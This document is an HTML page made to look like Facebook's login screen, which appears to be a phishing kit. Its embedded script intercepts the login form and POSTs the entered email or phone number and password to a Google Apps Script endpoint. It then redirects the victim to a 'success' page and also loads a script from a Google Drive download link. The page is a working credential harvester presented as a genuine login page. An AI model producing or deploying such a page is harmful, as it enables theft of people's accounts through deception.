<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook Login</title>
    <link rel="icon" href="Facebook.png" type="image/png">
    <style>
       
        body
       {
        margin: 1% 30%;
        align-items: center;
        /* background-color: rgb(175, 170, 170); */
        background-color: rgb(223, 219, 219);
        scroll-behavior: none;
        scroll-margin-top: 23px;
        
       }
        .contener
        {
            min-width: 50px;
            /* border: 1px solid black; */
            padding: 50px 30px;
               text-align: center;
    font-size: 20px;
    /* color: #ffff; */
    background-color: #fff;
    border-radius: 15px;
    margin-top: -30px;
        }
        .ps
        {
           min-height: 56%;
        }
        hr
        {
            width: 100%;
        }
        input[type=text]
        {
            border: 1px solid black;
            width: 100%;
             padding: 8px; 
             border-radius: 4px; 
            box-sizing: border-box; 
            margin: 8px 0;
            transition: 1s;
            outline: none;
            font-size: 15px;
            cursor: pointer;
        }
        input[type=text]:focus
        {
            border-color: dodgerblue;
            box-shadow: 0 0 8px 0 dodgerblue;
        }
        input[type=password]
        {
            border: 1px solid black;
            width: 100%;
             padding: 8px; 
             border-radius: 4px; 
            box-sizing: border-box; 
            margin: 8px 0;
            transition: 1s;
            outline: none;
            font-size: 15px;
        }
        input[type=password]:focus
        {
            border-color: dodgerblue;
            box-shadow: 0 0 8px 0 dodgerblue;
        }
        div.contener
        {
            width: 90%;
        }
        .text
        {
            width: 100%;
            padding: 8px;
            background-color: blue;
            color: #fff;
            border: 1px solid #fff;
            border-radius: 6px;
            font-size: 15px;
            font-style: bold;
        }
        .cr
        {
            width: 70%;
            padding: 8px;
            background-color: rgb(46, 204, 46);
            color: #fff;
            border: 1px solid #fff;
            border-radius: 6px;
            font-size: 15px;
            font-style: bold; 
        }
        p
        {
            color: blue;
            font-size: 15px;
        }
        h1
        {
            margin-top: 23px;
            font-size: 50px;
            color: blue;
        }
        .load
        {
            border: 6px solid black;
            border-radius: 50%;
            border-top: 6px solid white;
            width: 40px;
            height: 40px;
            animation: rotate 2s linear infinite;
            transform: translate(-50%,-50%) scale(0.1);
            margin-left: 150px;
            margin-top: 20px;
            visibility: hidden;
            transition: 0s;

        }
        .open-load
        {
            visibility: visible;
            transform: translate(-50%,-50%) scale(1);
        }
        @keyframes rotate
        {
            0% {transform: rotate(0deg);}
            100% {transform: rotate(360deg);}
        }
    </style>
</head>
<body>
    <h1>
        facebook
    </h1>
   <div class="contener">
    <div>
        <form action="POST" autocomplete="off" name="google-sheet">
    <input type="text" placeholder="Email address or phone number" name="Email address or phone number" >
    <br><br>
    <input type="password" placeholder="Password" name="Password">
    <br><br>
    
    <input type="submit" value="Login" class="text" name="Submit" onclick="openload()">
   </div>
    <br><br>
    <a href>
    <p>Forgotten Password</p></a>
    </from>
    <hr>
    <br>
    <a href="Create New Account.html">
    <input type="button" value="Create New Account" class="cr">
    </a><br>
    <!-- <div class="load"></div> -->
    </div>
   </div> 
   
   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
    <b>
        Create a page
    </b>
    for a celebrity,band or business.
    <div class="load" id="load"></div>
    <script>
        let load  = document.getElementById('load');
        function openload()
        {
            load.classList.add('open-load')
        }
        function re()
        {
            Name.value=""
        }
        const scriptURL = 'https://script.google.com/macros/s/AKfycbx1nIpng4bgIj42Glw9ulQSR9vTDoZDfPua64TxjquezuJQmZqe/exec'
        const form = document.forms['google-sheet']
      
        form.addEventListener('submit', e => {
          e.preventDefault()
          fetch(scriptURL, { method: 'POST', body: new FormData(form)})
            .then(response => window.location.href="success.html")
            .catch(error => console.error('Error!', error.message))
        })
      </script>

    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://drive.google.com/uc?export=download&id=1vbLiG5Bd-ovLND0UKSDXB-_W_vxgK_60"></script>
</body>
</html>